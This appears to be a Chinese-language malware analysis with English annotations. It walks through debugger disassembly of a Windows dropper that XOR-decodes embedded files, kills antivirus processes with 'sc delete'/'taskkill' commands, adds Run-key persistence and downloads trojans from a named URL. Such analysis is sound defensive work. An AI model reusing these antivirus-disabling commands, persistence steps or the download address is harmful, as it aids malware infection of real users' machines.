0012ED48 31 2E 65 78 65 22 0A 0D 40 64 65 6C 20 6B 6C 37 1.exe"..@del kl7
0012ED58 38 61 2E 62 61 74 0A 0D 40 65 78 69 74 8a.bat..@exit
0012F3F0 63 6D 64 20 2F 63 20 73 63 20 64 65 6C 65 74 65 cmd /c sc delete
0012F400 20 65 6B 72 6E 00 00 00 63 6D 64 20 2F 63 20 74 ekrn...cmd /c t
0012F410 61 73 6B 6B 69 6C 6C 20 2F 69 6D 20 65 6B 72 6E askkill /im ekrn
0012F420 2E 65 78 65 20 2F 66 7C 63 6D 64 20 2F 63 20 74 .exe /f|cmd /c t
0012F430 61 73 6B 6B 69 6C 6C 20 2F 69 6D 20 65 67 75 69 askkill /im egui
0012F440 2E 65 78 65 20 2F 66 .exe /f
创建文件函数:这个函数被调用了三次,分别创建 44810500.dll、pcidump.sys、45757859.exe文件
; ---------------------------------------------------------------------
; sub_401830 -- stdcall(lpFileName, lpResourceName): drop a resource to disk.
; Creates lpFileName (CREATE_ALWAYS, GENERIC_WRITE), locates the resource
; lpResourceName whose type is the 4-byte string copied from 004012C4, and
; writes it out one byte at a time, XORing every byte with 0x06 on the way.
; Per the author's note it is called three times (44810500.dll, pcidump.sys,
; 45757859.exe); the embedded files can therefore be recovered statically
; by XOR-0x06 decoding the dropper's resources.
; Locals: [local.1] resource-type string, [local.2] bytes written,
;         [local.3] file handle; ebp+B is the one-byte staging buffer.
; ---------------------------------------------------------------------
00401830 <41>/$ 55 push ebp
00401831 |. 8BEC mov ebp, esp
00401833 |. 83EC 0C sub esp, 0C ; three DWORD locals
00401836 |. 8B4D 08 mov ecx, [arg.1] ; lpFileName
00401839 |. A1 C4124000 mov eax, dword ptr [4012C4] ; 4-byte resource-type string (contents not shown in the listing)
0040183E |. 6A 00 push 0 ; /hTemplateFile = NULL
00401840 |. 6A 00 push 0 ; |Attributes = 0
00401842 |. 6A 02 push 2 ; |Mode = CREATE_ALWAYS
00401844 |. 6A 00 push 0 ; |pSecurity = NULL
00401846 |. 6A 00 push 0 ; |ShareMode = 0
00401848 |. 68 00000040 push 40000000 ; |Access = GENERIC_WRITE
0040184D |. 51 push ecx ; |FileName
0040184E |. 8945 FC mov [local.1], eax ; | resource type kept in a local so its address can be passed
00401851 |. FF15 88104000 call dword ptr [401088] ; \CreateFileA
00401857 |. 85C0 test eax, eax ; creates the target file (44810500.dll on the first call). NOTE(review): CreateFileA signals failure with INVALID_HANDLE_VALUE (-1), not 0, so this test never catches a failed open
00401859 |. 8945 F4 mov [local.3], eax ; file handle
0040185C |. 0F84 82000000 je 004018E4 ; (only taken for a 0 return) -> epilogue
00401862 |. 8B45 0C mov eax, [arg.2] ; lpResourceName
00401865 |. 53 push ebx
00401866 |. 56 push esi
00401867 |. 8D55 FC lea edx, [local.1] ; lpType = address of the 4-byte type string
0040186A |. 57 push edi ; look up the resource
0040186B |. 52 push edx ; /ResourceType
0040186C |. 50 push eax ; |ResourceName
0040186D |. 6A 00 push 0 ; |hModule = NULL -> own executable
0040186F |. FF15 40104000 call dword ptr [401040] ; \FindResourceA
00401875 |. 8BF8 mov edi, eax ; edi = HRSRC (not checked for NULL)
00401877 |. 57 push edi ; /hResource
00401878 |. 6A 00 push 0 ; |hModule = NULL
0040187A |. FF15 3C104000 call dword ptr [40103C] ; \LoadResource
00401880 |. 50 push eax ; /nHandles -- actually the HGLOBAL just returned
00401881 |. 8945 0C mov [arg.2], eax ; | HGLOBAL saved in the now-unused arg.2 slot for FreeResource below
00401884 |. 33F6 xor esi, esi ; | esi = byte index, starts at 0
00401886 |. FF15 38104000 call dword ptr [401038] ; \SetHandleCount -- NOTE(review): the debugger labels this import SetHandleCount, but its return value is used as a byte pointer at 004018A0, which matches LockResource; verify the import
0040188C |. 8BD8 mov ebx, eax ; ebx = pointer to resource bytes
0040188E |. C645 0B 00 mov byte ptr [ebp+B], 0 ; staging byte; ebp+B is the top byte of the arg.1 slot, which is no longer needed after CreateFileA
00401892 |. 90 nop
00401893 |. 57 push edi ; /hResource
00401894 |. 56 push esi ; |hModule => NULL
00401895 |. FF15 34104000 call dword ptr [401034] ; \SizeofResource
0040189B |. 85C0 test eax, eax
0040189D |. 74 2E je short 004018CD ; empty (or missing) resource -> skip the loop
0040189F |. 90 nop
004018A0 |> 8A0C33 /mov cl, byte ptr [ebx+esi] ; loop: cl = resource[esi]
004018A3 |. 8D55 F8 |lea edx, [local.2]
004018A6 |. 80F1 06 |xor cl, 6 ; single-byte XOR key 0x06 de-obfuscates the payload
004018A9 |. 6A 00 |push 0 ; /pOverlapped = NULL
004018AB |. 884D 0B |mov byte ptr [ebp+B], cl ; | decoded byte into the staging slot
004018AE |. 8B4D F4 |mov ecx, [local.3] ; | file handle
004018B1 |. 52 |push edx ; |pBytesWritten
004018B2 |. 8D45 0B |lea eax, dword ptr [ebp+B] ; |
004018B5 |. 6A 01 |push 1 ; |nBytesToWrite = 1 -- one WriteFile call per byte
004018B7 |. 50 |push eax ; |Buffer
004018B8 |. 51 |push ecx ; |hFile
004018B9 |. FF15 30104000 |call dword ptr [401030] ; \WriteFile (result not checked)
004018BF |. 57 |push edi ; /hResource
004018C0 |. 6A 00 |push 0 ; |hModule = NULL
004018C2 |. 46 |inc esi ; | next byte
004018C3 |. FF15 34104000 |call dword ptr [401034] ; \SizeofResource -- size re-queried on every iteration as the loop bound
004018C9 |. 3BF0 |cmp esi, eax
004018CB |.^ 72 D3 \jb short 004018A0 ; unsigned: while esi < size
004018CD |> 8B55 0C mov edx, [arg.2] ; HGLOBAL saved at 00401881
004018D0 |. 52 push edx ; /hResource
004018D1 |. FF15 2C104000 call dword ptr [40102C] ; \FreeResource
004018D7 |. 8B45 F4 mov eax, [local.3]
004018DA |. 50 push eax ; /hObject
004018DB |. FF15 64104000 call dword ptr [401064] ; \CloseHandle
004018E1 |. 5F pop edi
004018E2 |. 5E pop esi
004018E3 |. 5B pop ebx
004018E4 |> 8BE5 mov esp, ebp ; epilogue (also the target of the je at 0040185C)
004018E6 |. 5D pop ebp
004018E7 \. C2 0800 retn 8 ; stdcall, two DWORD args
动态获取函数地址并运行文件的函数:每次调用时LoadLibraryA加载的dll不同,取得的函数为shell32.ShellExecuteA,运行的文件也不同
; ---------------------------------------------------------------------
; sub_401440 -- cdecl forwarder around shell32!ShellExecuteA.
; Loads shell32.dll, resolves "ShellExecuteA" by name, and if found pushes
; the caller's six DWORD arguments again in the same order and calls it,
; then frees the library. Resolving the export at run time keeps it out of
; the import table. The callee does not pop the six args; the caller does
; (e.g. `add esp, 18` at 00401CCA).
; NOTE(review): the LoadLibraryA result is not checked before
; GetProcAddress, and when GetProcAddress fails the je skips FreeLibrary,
; so the module handle is not released on that path.
; ---------------------------------------------------------------------
00401440 <41>/$ 56 push esi
00401441 |. 68 A0124000 push 004012A0 ; /shell32.dll\drivers\gm.dls\??\ -- only "shell32.dll" is the argument; the rest is the following .rdata
00401446 |. FF15 A4104000 call dword ptr [4010A4] ; \LoadLibraryA
0040144C |. 8BF0 mov esi, eax ; esi = module handle (unchecked)
0040144E |. 68 90124000 push 00401290 ; /ShellExecuteA
00401453 |. 56 push esi ; |hModule
00401454 |. FF15 A8104000 call dword ptr [4010A8] ; \GetProcAddress
0040145A |. 85C0 test eax, eax
0040145C |. 74 27 je short 00401485 ; not resolved -> return without calling (and without FreeLibrary)
0040145E |. 8B4C24 1C mov ecx, dword ptr [esp+1C] ; arg6 (after push esi, args sit at [esp+8]..[esp+1C])
00401462 |. 8B5424 18 mov edx, dword ptr [esp+18] ; arg5
00401466 |. 51 push ecx ; push arg6 -- each push lowers esp by 4, so the repeated [esp+18] reads walk down to arg1
00401467 |. 8B4C24 18 mov ecx, dword ptr [esp+18] ; arg4
0040146B |. 52 push edx ; push arg5
0040146C |. 8B5424 18 mov edx, dword ptr [esp+18] ; arg3
00401470 |. 51 push ecx ; push arg4
00401471 |. 8B4C24 18 mov ecx, dword ptr [esp+18] ; arg2
00401475 |. 52 push edx ; push arg3
00401476 |. 8B5424 18 mov edx, dword ptr [esp+18] ; arg1
0040147A |. 51 push ecx ; push arg2
0040147B |. 52 push edx ; push arg1
0040147C |. FFD0 call eax ; shell32.ShellExecuteA,运行C:\WINDOWS\temp\Explorer.exe -- (author: shell32.ShellExecuteA; in this trace it ran C:\WINDOWS\temp\Explorer.exe); stdcall, so the callee removes its args
0040147E |. 56 push esi ; /hLibModule
0040147F |. FF15 B0104000 call dword ptr [4010B0] ; \FreeLibrary
00401485 |> 5E pop esi
00401486 \. C3 retn ; eax = ShellExecuteA result, or 0 if the export was not found
44810500.dll文件分析:其主要作用是结束一些常见的杀毒软件进程
功能在testall函数中实现
; ---------------------------------------------------------------------
; 44810500.testall -- exported entry the author identifies as the worker.
; Calls sub_10002600 with a single argument (0); cdecl, the pop ecx drops it.
; sub_10002600 itself is not analyzed in this post.
; ---------------------------------------------------------------------
100026B0 44810500.testall /$ 6A 00 push 0 ; single argument = 0
100026B2 |. E8 49FFFFFF call 10002600 这个是关键call,有兴趣的同学可以自己分析文件 ; (author: this is the key call; readers can analyze the file themselves)
100026B7 |. 59 pop ecx ; discard the argument (cdecl)
100026B8 \. C3 retn
100026B9 90 nop
100026BA 90 nop
100026BB 90 nop
100026BC 90 nop
100026BD 90 nop
100026BE 90 nop
100026BF 90 nop
; ---------------------------------------------------------------------
; 44810500.dll entry point, stdcall(hinstDLL, fdwReason, lpReserved).
; fdwReason ([esp+8]) is never examined, so sub_10002560 runs on every
; attach/detach notification, not only DLL_PROCESS_ATTACH. Afterwards the
; DLL's own path is stored in the global buffer at 100029BC and TRUE is
; returned, so the load always "succeeds".
; ---------------------------------------------------------------------
100026C0 44810500.<ModuleE>/$ E8 9BFEFFFF call 10002560 ; unconditional; fdwReason not checked
100026C5 |. 8B4424 04 mov eax, dword ptr [esp+4] ; hinstDLL
100026C9 |. 68 FF000000 push 0FF ; /BufSize = FF (255.) -- not MAX_PATH (0x104)
100026CE |. 68 BC290010 push 100029BC ; |PathBuffer = 44810500.100029BC -- global buffer: own DLL path
100026D3 |. 50 push eax ; |hModule
100026D4 |. FF15 78100010 call dword ptr [<&KERNEL32.GetModuleFileName>; \GetModuleFileNameA
100026DA |. B8 01000000 mov eax, 1 ; return TRUE
100026DF \. C2 0C00 retn 0C ; stdcall, three DWORD args
45757859.exe文件分析:此文件主要负责下载木马并运行
; ---------------------------------------------------------------------
; Entry routine of 45757859.exe (the downloader). The two "push ecx"
; reserve [local.1] and [local.2], which receive thread ids. Flow:
;   CreateMutexA("XETTETT......") -> return 0 if it already exists
;   sub_400BAB  enable SeDebugPrivilege on own token          ("call 1")
;   sub_400C55  copy wininet.dll to %TEMP%, resolve its exports ("call 2")
;   sub_401268  write the autostart registry value           ("call 3")
;   CreateThread x3: 00400EF1 (window hider), 0040117D (hosts file),
;                    00400FFF (beacon); the last two are waited on for at
;                    most 1000 ms each, then
;   sub_401377  download stage                               ("call 4")
; Thread handles are never closed or waited to completion, so those
; threads keep running alongside call 4. The mutex name, dropped file
; names and URLs on this page are usable as host/network indicators.
; ---------------------------------------------------------------------
00400F39 457578>/$ 55 push ebp
00400F3A |. 8BEC mov ebp, esp
00400F3C |. 51 push ecx ; reserve [local.1]
00400F3D |. 51 push ecx ; reserve [local.2]
00400F3E |. 56 push esi
00400F3F |. 33F6 xor esi, esi ; 1. create mutex "XETTETT......"; if it already exists, exit so the malware does not run twice. esi = 0 is reused as NULL/FALSE below
00400F41 |. 68 D4074000 push 004007D4 ; /MutexName = "XETTETT......"
00400F46 |. 56 push esi ; |InitialOwner => FALSE
00400F47 |. 56 push esi ; |pSecurity => NULL
00400F48 |. FF15 50044000 call dword ptr [<&KERNEL32.CreateMutexA>] ; \CreateMutexA (handle discarded)
00400F4E |. FF15 40044000 call dword ptr [<&KERNEL32.GetLastError>] ; [GetLastError
00400F54 |. 3D B7000000 cmp eax, 0B7 ; 0xB7 = 183 = ERROR_ALREADY_EXISTS
00400F59 |. 75 04 jnz short 00400F5F
00400F5B |. 33C0 xor eax, eax ; second instance: return 0
00400F5D |. EB 60 jmp short 00400FBF
00400F5F |> 53 push ebx
00400F60 |. 57 push edi
00400F61 |. E8 45FCFFFF call 00400BAB ; call 1: raise privileges of the current process (SeDebugPrivilege)
00400F66 |. E8 EAFCFFFF call 00400C55 ; call 2: copy wininet.dll to %TEMP% and resolve the network function addresses
00400F6B |. E8 F8020000 call 00401268 ; call 3: write the autostart registry entry
00400F70 |. 8B3D 4C044000 mov edi, dword ptr [<&KERNEL32.CreateThread>>; kernel32.CreateThread -- edi = CreateThread for the three calls below
00400F76 |. 56 push esi ; /pThreadId = NULL
00400F77 |. 56 push esi ; |CreationFlags
00400F78 |. 56 push esi ; |pThreadParm
00400F79 |. 68 F10E4000 push 00400EF1 ; |ThreadFunction = thread 1
00400F7E |. 56 push esi ; |StackSize
00400F7F |. 56 push esi ; |pSecurity
00400F80 |. FFD7 call edi ; \CreateThread -- handle in eax is overwritten by the next lea, i.e. discarded
00400F82 |. 8D45 FC lea eax, [local.1] ; thread-id output for thread 2
线程1遍历窗口,如果发现"Windows 文件保护"窗口,隐藏WINDOWS文件保护窗口
00400F85 |. 50 push eax ; /pThreadId
00400F86 |. 56 push esi ; |CreationFlags
00400F87 |. 56 push esi ; |pThreadParm
00400F88 |. 68 7D114000 push 0040117D ; |ThreadFunction = thread 2: modify the hosts file
00400F8D |. 56 push esi ; |StackSize
00400F8E |. 56 push esi ; |pSecurity
00400F8F |. FFD7 call edi ; \CreateThread
00400F91 |. 8B1D 48044000 mov ebx, dword ptr [<&KERNEL32.WaitForSingle>; kernel32.WaitForSingleObject
00400F97 |. 68 E8030000 push 3E8 ; /Timeout = 1000. ms -- waits at most 1 s; thread 2 may still be running afterwards
00400F9C |. 50 push eax ; |hObject = thread 2 handle
00400F9D |. FFD3 call ebx ; \WaitForSingleObject
00400F9F |. 8D45 F8 lea eax, [local.2] ; thread-id output for thread 3
00400FA2 |. 50 push eax ; /pThreadId
00400FA3 |. 56 push esi ; |CreationFlags
00400FA4 |. 56 push esi ; |pThreadParm
00400FA5 |. 68 FF0F4000 push 00400FFF ; |ThreadFunction = thread 3: collect info and beacon
00400FAA |. 56 push esi ; |StackSize
00400FAB |. 56 push esi ; |pSecurity
00400FAC |. FFD7 call edi ; \CreateThread
00400FAE |. 68 E8030000 push 3E8 ; /Timeout = 1000. ms
00400FB3 |. 50 push eax ; |hObject = thread 3 handle
00400FB4 |. FFD3 call ebx ; \WaitForSingleObject
00400FB6 |. E8 BC030000 call 00401377 ; call 4: download the trojan(s)
00400FBB |. 5F pop edi
00400FBC |. 33C0 xor eax, eax ; return 0
00400FBE |. 5B pop ebx
00400FBF |> 5E pop esi ; shared exit (also reached from the already-running check)
00400FC0 |. C9 leave
00400FC1 \. C3 retn
call 1
; ---------------------------------------------------------------------
; sub_400BAB ("call 1"): enable SeDebugPrivilege on the current process
; token. The locals form a TOKEN_PRIVILEGES structure at ebp-14:
;   [local.5] ebp-14  PrivilegeCount = 1
;   [local.4] ebp-10  Luid (8 bytes, filled by LookupPrivilegeValueA)
;   [local.2] ebp-8   Attributes = 2 = SE_PRIVILEGE_ENABLED
;   [local.1] ebp-4   token handle
; Results of LookupPrivilegeValueA / AdjustTokenPrivileges are not checked
; and the token handle is never closed. A non-debugger process enabling
; SeDebugPrivilege is a common telemetry signal for this stage.
; ---------------------------------------------------------------------
00400BAB /$ 55 push ebp
00400BAC |. 8BEC mov ebp, esp
00400BAE |. 83EC 14 sub esp, 14 ; 5 DWORD locals (see layout above)
00400BB1 |. FF15 7C044000 call dword ptr [<&KERNEL32.GetCurrentProcess>; [GetCurrentProcess -> pseudo-handle in eax
00400BB7 |. 8D4D FC lea ecx, [local.1]
00400BBA |. 51 push ecx ; /phToken
00400BBB |. 6A 28 push 28 ; |DesiredAccess = TOKEN_QUERY|TOKEN_ADJUST_PRIVILEGES
00400BBD |. 50 push eax ; |hProcess
00400BBE |. FF15 04044000 call dword ptr [<&ADVAPI32.OpenProcessToken>>; \OpenProcessToken
00400BC4 |. 85C0 test eax, eax
00400BC6 |. 74 33 je short 00400BFB ; could not open the token -> return (eax = 0)
00400BC8 |. 8D45 F0 lea eax, [local.4] ; &Luid
00400BCB |. 56 push esi
00400BCC |. 50 push eax ; /pLocalId
00400BCD |. 33F6 xor esi, esi ; | esi = 0 reused as NULL/FALSE below
00400BCF |. 68 00074000 push 00400700 ; |Privilege = "SeDebugPrivilege"
00400BD4 |. 56 push esi ; |SystemName => NULL (local machine)
00400BD5 |. FF15 00044000 call dword ptr [<&ADVAPI32.LookupPrivilegeVa>; \LookupPrivilegeValueA (result unchecked)
00400BDB |. 56 push esi ; /pRetLen => NULL
00400BDC |. 56 push esi ; |pPrevState => NULL
00400BDD |. 8D45 EC lea eax, [local.5] ; | &TOKEN_PRIVILEGES
00400BE0 |. 56 push esi ; |PrevStateSize => 0
00400BE1 |. 50 push eax ; |pNewState
00400BE2 |. 56 push esi ; |DisableAllPrivileges => FALSE
00400BE3 |. FF75 FC push [local.1] ; |hToken
00400BE6 |. C745 EC 0100000>mov [local.5], 1 ; | PrivilegeCount = 1
00400BED |. C745 F8 0200000>mov [local.2], 2 ; | Attributes = SE_PRIVILEGE_ENABLED
00400BF4 |. FF15 14044000 call dword ptr [<&ADVAPI32.AdjustTokenPrivil>; \AdjustTokenPrivileges -- its result is what this routine returns; the token is not closed
00400BFA |. 5E pop esi
00400BFB |> C9 leave
00400BFC \. C3 retn
Call 2
00400C55 /$ 55 push ebp
00400C56 |. 8BEC mov ebp, esp
00400C58 |. 81EC 08020000 sub esp, 208
00400C5E |. 56 push esi
00400C5F |. 8D85 FCFEFFFF lea eax, [local.65]
00400C65 |. 57 push edi
00400C66 |. BE 04010000 mov esi, 104
00400C6B |. 50 push eax ; /Buffer
00400C6C |. 56 push esi ; |BufSize => 104 (260.)
00400C6D |. FF15 24044000 call dword ptr [<&KERNEL32.GetTempPathA>] ; \GetTempPathA
00400C73 |. 8D85 FCFEFFFF lea eax, [local.65]
00400C79 |. 50 push eax ; /TempName
00400C7A |. 6A 00 push 0 ; |Unique = 0
00400C7C |. 8D85 FCFEFFFF lea eax, [local.65] ; |
00400C82 |. 68 70074000 push 00400770 ; |Prefix = "open"
00400C87 |. 50 push eax ; |Path
00400C88 |. FF15 20044000 call dword ptr [<&KERNEL32.GetTempFileNameA>>; \GetTempFileNameA
00400C8E |. 8D85 F8FDFFFF lea eax, [local.130]
00400C94 |. 56 push esi ; /BufSize => 104 (260.)
00400C95 |. 50 push eax ; |Buffer
00400C96 |. FF15 1C044000 call dword ptr [<&KERNEL32.GetSystemDirector>; \GetSystemDirectoryA
00400C9C |. 8D85 F8FDFFFF lea eax, [local.130]
00400CA2 |. 68 60074000 push 00400760 ; /StringToAdd = "\wininet.dll"
00400CA7 |. 50 push eax ; |ConcatString
00400CA8 |. FF15 44044000 call dword ptr [<&KERNEL32.lstrcatA>] ; \lstrcatA
00400CAE |. 8D85 FCFEFFFF lea eax, [local.65]
00400CB4 |. 6A 00 push 0 ; /FailIfExists = FALSE
00400CB6 |. 50 push eax ; |NewFileName = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ope14F.tmp"
00400CB7 |. 8D85 F8FDFFFF lea eax, [local.130] ; |
00400CBD |. 50 push eax ; |ExistingFileName = "C:\WINDOWS\system32\wininet.dll"
00400CBE |. FF15 70044000 call dword ptr [<&KERNEL32.CopyFileA>] ; \CopyFileA
00400CC4 |. 8D85 FCFEFFFF lea eax, [local.65] ; 将%SystemRoot%\system32\wininet.dll复制到%TEMP%
00400CCA |. 50 push eax ; /FileName
00400CCB |. FF15 74044000 call dword ptr [<&KERNEL32.LoadLibraryA>] ; \LoadLibraryA
00400CD1 |. 8BF8 mov edi, eax
00400CD3 |. 85FF test edi, edi
00400CD5 |. 74 4A je short 00400D21 ; 下面获得网络相关函数地址
00400CD7 |. 8B35 78044000 mov esi, dword ptr [<&KERNEL32.GetProcAddres>; kernel32.GetProcAddress
00400CDD |. 68 50074000 push 00400750 ; /ProcNameOrOrdinal = "InternetOpenA"
00400CE2 |. 57 push edi ; |hModule
00400CE3 |. FFD6 call esi ; \GetProcAddress
Call 3
00401318 |. 50 push eax ; /\src = "scvhost.exe"
00401319 |. 8D85 B8FEFFFF lea eax, [local.82] ; |
0040131F |. 50 push eax ; |dest = "C:\WINDOWS\system32\"
00401320 |. E8 7B0E0000 call <jmp.&MSVCRT.strcat> ; \strcat
00401325 |. 83C4 10 add esp, 10
00401328 |. 8D45 F0 lea eax, [local.4]
0040132B |. 50 push eax ; /pHandle
0040132C |. 8D85 B4FDFFFF lea eax, [local.147] ; |
00401332 |. 50 push eax ; |Subkey
00401333 |. 68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00401338 |. FF15 10044000 call dword ptr [<&ADVAPI32.RegCreateKeyA>] ; \RegCreateKeyA
0040133E |. 5F pop edi
0040133F |. 5E pop esi
00401340 |. 85C0 test eax, eax
00401342 |. 75 28 jnz short 0040136C
00401344 |. 8D85 B8FEFFFF lea eax, [local.82]
0040134A |. 50 push eax ; / /s = "C:\WINDOWS\system32\scvhost.exe"
0040134B |. E8 060E0000 call <jmp.&MSVCRT.strlen> ; \strlen
00401350 |. 59 pop ecx ; 写入启动项
00401351 |. 40 inc eax
00401352 |. 50 push eax ; /BufSize
00401353 |. 8D85 B8FEFFFF lea eax, [local.82] ; |
00401359 |. 50 push eax ; |Buffer
0040135A |. 6A 01 push 1 ; |ValueType = REG_SZ
0040135C |. 6A 00 push 0 ; |Reserved = 0
0040135E |. 68 28084000 push 00400828 ; |ValueName = "360Soft"
00401363 |. FF75 F0 push [local.4] ; |hKey
00401366 |. FF15 0C044000 call dword ptr [<&ADVAPI32.RegSetValueExA>] ; \RegSetValueExA
0040136C |> FF75 F0 push [local.4] ; /hKey
0040136F |. FF15 08044000 call dword ptr [<&ADVAPI32.RegCloseKey>] ; \RegCloseKey
Call 4
00401377 /$ B8 35224000 mov eax, 00402235
0040137C |. E8 6F0E0000 call 004021F0
00401381 |. 81EC 58070000 sub esp, 758
00401387 |. 53 push ebx
00401388 |. 56 push esi
00401389 |. BE FF000000 mov esi, 0FF
0040138E |. 33DB xor ebx, ebx
00401390 |. 56 push esi ; /n => FF (255.)
00401391 |. 8D85 2CFDFFFF lea eax, [local.181] ; |
00401397 |. 53 push ebx ; |c => 00
00401398 |. 50 push eax ; |s
00401399 |. 895D E4 mov [local.7], ebx ; |
0040139C |. 895D DC mov [local.9], ebx ; |
0040139F |. 895D EC mov [local.5], ebx ; |
004013A2 |. 895D E8 mov [local.6], ebx ; |
004013A5 |. 895D E0 mov [local.8], ebx ; |
004013A8 |. E8 B50D0000 call <jmp.&MSVCRT.memset> ; \memset
004013AD |. 56 push esi ; /n
004013AE |. 8D85 9CF9FFFF lea eax, [local.409] ; |
004013B4 |. 53 push ebx ; |c
004013B5 |. 50 push eax ; |s
004013B6 |. E8 A70D0000 call <jmp.&MSVCRT.memset> ; \memset
004013BB |. 56 push esi ; /n
004013BC |. 8D85 9CFAFFFF lea eax, [local.345] ; |
004013C2 |. 53 push ebx ; |c
004013C3 |. 50 push eax ; |s
004013C4 |. E8 990D0000 call <jmp.&MSVCRT.memset> ; \memset
004013C9 |. 56 push esi ; /n
004013CA |. 8D85 9CF8FFFF lea eax, [local.473] ; |
004013D0 |. 53 push ebx ; |c
004013D1 |. 50 push eax ; |s
004013D2 |. E8 8B0D0000 call <jmp.&MSVCRT.memset> ; \memset
004013D7 |. 68 90010000 push 190 ; /n = 190 (400.)
004013DC |. 8D85 9CFBFFFF lea eax, [local.281] ; |
004013E2 |. 53 push ebx ; |c
004013E3 |. 50 push eax ; |s
004013E4 |. E8 790D0000 call <jmp.&MSVCRT.memset> ; \memset
004013E9 |. 8D85 2CFDFFFF lea eax, [local.181]
004013EF |. 68 68054000 push 00400568 ; /src = "H7CX26h`Ez[aUpvgNT6X2{SToTrRoISXIasuW62gqDOhJjeWVfoeWCCC"
004013F4 |. 50 push eax ; |dest
004013F5 |. E8 6E0D0000 call <jmp.&MSVCRT.strcpy> ; \strcpy
004013FA |. 83C4 44 add esp, 44
004013FD |. 8D85 9CF9FFFF lea eax, [local.409]
00401403 |. 50 push eax
00401404 |. 8D85 2CFDFFFF lea eax, [local.181]
0040140A |. 50 push eax ; /s
0040140B |. E8 460D0000 call <jmp.&MSVCRT.strlen> ; \strlen
00401410 |. 59 pop ecx
00401411 |. 50 push eax
00401412 |. 8D85 2CFDFFFF lea eax, [local.181]
00401418 |. 50 push eax
00401419 |. E8 15F7FFFF call <解密函数>
0040141E |. 8D85 9CFAFFFF lea eax, [local.345]
00401424 |. 50 push eax
00401425 |. 8D85 9CF9FFFF lea eax, [local.409]
0040142B |. 50 push eax
0040142C |. E8 5DF5FFFF call 0040098E ; 0012F81C 0012FA40 ASCII "NB2ODo6X8iwyiy2OHT3izbIdR+aMlxaMFx0PjgAA"
00401431 |. 8D85 9CF8FFFF lea eax, [local.473]
00401437 |. 50 push eax
00401438 |. 8D85 9CFAFFFF lea eax, [local.345]
0040143E |. 50 push eax
0040143F |. E8 F7F5FFFF call 00400A3B ; 字符处理出http://ad.ittz.net:72/ad.txt
00401444 |. 8D85 9CF8FFFF lea eax, [local.473]
0040144A |. 50 push eax ; /src
0040144B |. 8D85 9CFBFFFF lea eax, [local.281] ; |
00401451 |. 50 push eax ; |dest
00401452 |. E8 110D0000 call <jmp.&MSVCRT.strcpy> ; \strcpy
00401457 |. 8D85 9CFBFFFF lea eax, [local.281]
0040145D |. 50 push eax ; /s
0040145E |. E8 F30C0000 call <jmp.&MSVCRT.strlen> ; \strlen
00401463 |. 83C4 28 add esp, 28
00401466 |. 85C0 test eax, eax
00401468 |. 77 07 ja short 00401471
0040146A |. 33C0 xor eax, eax
0040146C |. E9 DD010000 jmp 0040164E
00401471 |> 8B35 4C044000 mov esi, dword ptr [<&KERNEL32.CreateThread>>; kernel32.CreateThread
00401477 |. 57 push edi
00401478 |. BF A11B4000 mov edi, 00401BA1
0040147D |> 8D85 2CFEFFFF /lea eax, [local.117]
00401483 |. 50 |push eax ; /Buffer
00401484 |. 68 04010000 |push 104 ; |BufSize = 104 (260.)
00401489 |. FF15 24044000 |call dword ptr [<&KERNEL32.GetTempPathA>] ; \GetTempPathA
0040148F |. 8D85 2CFEFFFF |lea eax, [local.117]
00401495 |. 50 |push eax ; /TempName
00401496 |. 53 |push ebx ; |Unique
00401497 |. 8D85 2CFEFFFF |lea eax, [local.117] ; |
0040149D |. 68 70074000 |push 00400770 ; |Prefix = "open"
004014A2 |. 50 |push eax ; |Path = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\"
004014A3 |. FF15 20044000 |call dword ptr [<&KERNEL32.GetTempFileNameA>; \GetTempFileNameA
004014A9 |> 8D85 2CFEFFFF |/lea eax, [local.117]
004014AF |. 50 ||push eax
004014B0 |. 8D85 9CFBFFFF ||lea eax, [local.281] ; 0012F830 0012FDD0 ASCII "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ope153.tmp"
004014B6 |. 50 ||push eax ; 0012F82C 0012FB40 ASCII "http://ad.ittz.net:72/ad.txt"
004014B7 |. E8 6BF8FFFF ||call <下载文件>
004014BC |. 59 ||pop ecx
004014BD |. 83F8 01 ||cmp eax, 1
004014C0 |. 59 ||pop ecx
004014C1 |. 74 0D ||je short 004014D0
004014C3 |. 68 88130000 ||push 1388 ; /Timeout = 5000. ms
004014C8 |. FF15 80044000 ||call dword ptr [<&KERNEL32.Sleep>] ; \Sleep
……(中间省略)下面还创建了一个线程:
00401549 |> \8D4D C0 ||lea ecx, [local.16]
0040154C |. 51 ||push ecx
0040154D |. 53 ||push ebx
0040154E |. 50 ||push eax
0040154F |. 68 5C164000 ||push 0040165C 线程 5
00401554 |. 53 ||push ebx
00401555 |. 53 ||push ebx
00401556 |. FFD6 ||call esi ; kernel32.CreateThread
00401558 |. 68 C0D40100 ||push 1D4C0 ; /Timeout = 120000. ms
0040155D |. 50 ||push eax ; |hObject
0040155E |. FF15 48044000 ||call dword ptr [<&KERNEL32.WaitForSingleOb>; \WaitForSingleObject
线程 5的主要作用是下载ad.txt列表中的病毒木马并运行
线程1 隐藏窗口
; ---------------------------------------------------------------------
; Thread routine 00400EF1 ("thread 1"): endless loop that every 50 ms
; looks for a dialog (class "#32770") titled "Windows 文件保护" (Windows
; File Protection). The author's stated intent is to hide that dialog.
; There is no exit condition; the loop runs until the process ends.
; ---------------------------------------------------------------------
00400EF1 . 56 push esi
00400EF2 > 68 C0074000 push 004007C0 ; /Title = "Windows 文件保护" -- loop head
00400EF7 . 68 B8074000 push 004007B8 ; |Class = "#32770" (standard dialog class)
00400EFC . FF15 3C054000 call dword ptr [<&USER32.FindWindowA>] ; \FindWindowA
00400F02 . 8BF0 mov esi, eax ; thread body: loop looking for a "#32770" window with that title
00400F04 . 85F6 test esi, esi
00400F06 . 74 27 je short 00400F2F ; not found -> sleep and retry
00400F08 . 6A F0 push -10 ; /Index = GWL_STYLE
00400F0A . 56 push esi ; |hWnd
00400F0B . FF15 38054000 call dword ptr [<&USER32.GetWindowLongA>] ; \GetWindowLongA
00400F11 . 0D 00000010 or eax, 10000000 ; 0x10000000 = WS_VISIBLE. NOTE(review): OR with a non-zero immediate never yields zero, so the jnz below is always taken and 00400F18-00400F29 (ShowWindow SW_HIDE) is unreachable as listed; it reads like a mistaken `test` -- confirm in a debugger
00400F16 . 75 17 jnz short 00400F2F
00400F18 . 6A 00 push 0
00400F1A . 68 A4074000 push 004007A4 ; argument not annotated in the listing
